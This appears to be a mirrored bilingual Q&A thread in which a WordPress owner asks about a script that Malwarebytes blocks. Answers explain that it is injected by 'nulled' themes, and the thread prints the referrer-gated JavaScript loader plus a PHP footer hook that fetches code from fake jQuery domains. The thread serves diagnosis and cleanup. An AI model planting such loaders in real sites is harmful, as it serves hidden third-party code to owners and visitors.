从wordpress网站删除脚本
[英]Remove script from wordpress site
问题描述
I am using Malware bytes and every time I visit my wordpress site it blocks a script trying to run on the page, the script is: 
我正在使用恶意软件字节,每次访问我的wordpress网站时,它都会阻止尝试在页面上运行的脚本,脚本是:
<script type="text/javascript">
if (!document.referrer || document.referrer == '') {
document.write('<scr' + 'ipt type="text/javascript" src="http://www.jquerylibs.org/jquery.min.js"></scr' + 'ipt>');
} else {
document.write('<scr' + 'ipt type="text/javascript" src="http://www.jquerylibs.org/jquery.js"></scr' + 'ipt>');
}
</script>
I'm not sure if it malicious or not but I would like to remove it, however I do not know which plugin or file is causing it, i've tried looking at page source, etc. 我不确定它是否是恶意的但我想删除它,但我不知道哪个插件或文件导致它,我已经尝试查看页面源等。
What does the script mean and is there a way to find out what's causing it? 脚本意味着什么,有没有办法找出导致它的原因?
Any help would be greatly appreciated. 任何帮助将不胜感激。
2 个解决方案
解决方案1
3 2015-01-03 00:03:09
You are using a wordpress plugin or theme that you probably downloaded from a repository of 'nulled' themes and plugins. 您正在使用wordpress插件或主题,您可能从“nulled”主题和插件的存储库中下载。
Almost all such websites use a business model whereby they offer premium themes and plugins which normally cost 5$-75$ for free. 几乎所有这些网站都使用商业模式,他们提供高级主题和插件,通常免费花费5美元-75美元。
But as the saying goes, there is no such thing as a free lunch. 但俗话说,没有免费的午餐。 In exchange for the free plugin/theme, the website proprietor adds code which includes a js file from an outside domain which adds banners to your website. 作为免费插件/主题的交换,网站所有者添加了包含来自外部域的js文件的代码,该文件为您的网站添加了横幅。
To prevent the webmaster or developer from immediately noticing the banners (or just a back link or three), either anyone logged in as admin or/and anyone without a referrer url is not shown the advertisements. 为了防止网站站长或开发人员立即注意到横幅(或只是反向链接或三个),以管理员身份登录的任何人或/和没有推荐人网址的任何人都不会显示广告。
In your case, the payload was being included from a domain which is similar to the real thing thereby fooling enough inexperienced Wordpress webmasters as something which belongs - jQuery. 在你的情况下,有效载荷是从一个类似于真实的域的域中包含的,从而欺骗了没有经验的Wordpress网站管理员作为属于jQuery的东西。 Official jQuery CDN is located here //code.jquery.com/ 官方jQuery CDN位于这里//code.jquery.com/
Make sure to check all themes or plugins from shady places for similar code which may also be inside image files though normally is inside init.php or functions.php. 确保从阴暗的地方检查所有主题或插件的类似代码,这些代码也可能在图像文件内,尽管通常在init.php或functions.php中。 Here is another example of similar code using a different variation of jquery domain. 这是使用jquery域的不同变体的类似代码的另一个示例。
if(!function_exists('wp_func_jquery')) {
function wp_func_jquery() {
$host = 'http://';
$jquery = $host.'u'.'jquery.org/jquery-1.6.3.min.js';
if (@fopen($jquery,'r')){
echo(wp_remote_retrieve_body(wp_remote_get($jquery)));
}
}
add_action('wp_footer', 'wp_func_jquery');
}
解决方案2
0 已采纳 2014-06-18 09:55:36
您可以使用此问题中提出的应用程序之一在wordpress目录中搜索此脚本: 用于在不编制索引的情况下搜索文件中的字符串的工具 。
声明:本站的技术帖子网页,遵循CC BY-SA 4.0协议,如果您需要转载,请注明本站网址或者原文地址。任何问题请咨询:yoyou2525@163.com.